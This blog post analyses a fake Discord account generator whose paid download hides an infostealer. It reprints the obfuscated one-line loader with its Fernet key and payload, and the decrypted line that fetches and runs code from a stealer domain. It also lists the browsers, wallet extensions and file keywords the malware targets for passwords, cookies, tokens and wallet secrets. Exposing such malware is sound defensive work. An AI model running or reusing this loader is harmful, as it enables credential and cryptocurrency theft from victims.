Spring-0

Posted on Jun 9 • Updated on Jun 17

Exposing the Deception: Discord Account Generator with Hidden Malware

#cybersecurity #security #opensource

The Discord community has become a haven for malicious actors, whether it is through utilizing Discord's CDN server to spread malicious files with a trusted link, using Discord servers as C2 servers, and more.

More specifically, in this post I will be investigating one of many malicious "discord token generators" on the market, lets get started.

The software is advertised on GitHub as a open source project here.

If you head to the project description, you will see something quite weird. Open source a non-functional version of the project and advertise a paid version in that very same repository?

The shop is powered by sell.app so the website itself does not seem malicious.

Now lets investigate the paid version download.

The download consists of a "genSetup.zip" file containing the following:

config.toml: Empty configuration file, maybe it gets generated? (Hint: no it doesn't)
key.txt: Seems like where the user is meant to enter their key. I am presuming one is given after making the purchase.
requirements.txt: Consists of valid libraries that are required for this type of project.
start.bat: Simply runs the python file, nothing special there.

Opening main.py we see the following (notice the imports)

After reviewing the rest of the code it is identical to the version the actor uploaded to GitHub. There does not seem to be any malicious code, well at least not malicious to the user. Discord says otherwise.

So where is this malicious code? We were given a non obfuscated python file.

You may have already noticed in the initial code screenshot, but the horizontal scrollbar informs us that there is much more content to see. And turns out the malicious code was on the very first line just padded with a bunch of white spacing.

Here is the revised code of the first few lines with the white spacing removed.

import requests   ;import os;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk=').decrypt(b'gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPUvA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1ZkvtJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd0nwK2sU=')) # type: ignore

A sneaky one liner. Now we can begin examining the payload.

Firstly it installs the following libraries:
These libraries were not listed in the provided "requirements.txt" file.

cryptography
fernet
requests

The # type: ignore is used to hide type errors.

We can clearly see that some encrypted code is being executed through the exec() function call.

Lucky for us, the fernet encryption key is right there in the code!

If the encryption key is provided in the source code, what is the point of encrypting the payload?
This is an evasive technique used to evade any signature based malware scanners.

Using the following code I wrote, I was able to see the decrypted code.

key = "NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk="
message = "gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPUvA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1ZkvtJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd0nwK2sU="

fernet = Fernet(key)
decrypted_message = fernet.decrypt(message)
print(decrypted_message.decode())

And this is the output:

exec(requests.get('https://1312stealer.ru/paste?userid=1000000000').text.replace('<pre>','').replace('</pre>',''))

Yet another exec() function call, with the content from a website with the domain 1312stealer. Not very subtle now.

Anyways, lets see this what is being executed.

Installing fernet again? And this time with a different system execution command? Looks to me that someone has been using ctrl+c & ctrl+v too much 😂

Lets break this down.
The code is creating a file named "gruppe.py" in the APPDATA directory and writing code into it and finally executes it.

Judging by the length of the encrypted payload (trimmed in the screenshot above) it looks like the final payload.

Lets decrypt it using the same method used previously and see exactly what this malware is doing.

There is a targeted list of browsers, browser extensions, wallets, directories to search, file keywords, file extensions, and discord token paths.

Here are the specific targets:

Browsers

Google Chrome
Microsoft Edge
Opera
Opera GX
Brave
Yandex
Firefox

Browser Extensions

Authenticator
Binance
Bitapp
BoltX
Coin98
Coinbase
Core
Crocobit
Equal
Ever
ExodusWeb3
Fewcha
Finnie
Guarda
Guild
HarmonyOutdated
Iconex
Jaxx
Kaikas
KardiaChain
Keplr
Liquality
MEWCX
MaiarDEFI
Martian
Math
Metamask
Metamask2
Mobox
Nami
Nifty
Oxygen
PaliWallet
Petra
Phantom
Pontem
Ronin
Safepal
Saturn
Slope
Solfare
Sollet
Starcoin
Swash
TempleTezos
TerraStation
Tokenpocket
Ton
Tron
Trust Wallet
Wombat
XDEFI
XMR.PT
XinPay
Yoroi
iWallet

Wallets

Atomic
Exodus
Electrum
Electrum-LTC
Zcash
Armory
Bytecoin
Jaxx
Etherium
Guarda
Coinomi

Target Paths

Desktop
Documents
Downloads
OneDrive\Documents
OneDrive\Desktop

File Keywords

passw
mdp
mot_de_passe
login
secret
account
acount
paypal
banque
metamask
wallet
crypto
exodus
discord
2fa
code
memo
compte
token
backup
seecret

Now let's further investigate into how they are being targeted.

Firstly, passwords and cookies are being retrieved from the browser and saved to "APPDATA\gruppe_storage". This storage folder is used to store all the details extracted from the victim's machine.

The passwords that are being retrieved are the ones that you choose to save (That popup that asks you to save password whenever you register to a site).

Browser extension folders are simply being zipped up whole, no specific data is being extracted from them.

Using regular expression, discord tokens are being retrieved from the local discord files. Along with tokens, discord connected data including phone numbers, emails, display name, user id are also being retrieved.

In case you are not aware, having access to an individual's discord token allows you to authenticate as them regardless of two factor authentication.

Files located in the Desktop or Documents directories are being filtered based on the target keywords and file extensions listed above.

Similar to browser extensions, wallet paths are also being zipped up whole.

Specific to the Atomic and Exodus wallets, malicious code retrieved from https://1312stealer.ru/wallet and https://1312stealer.ru/wallet/atomic are being written to the wallet directories which injects into the wallets capturing mnemonics and passwords.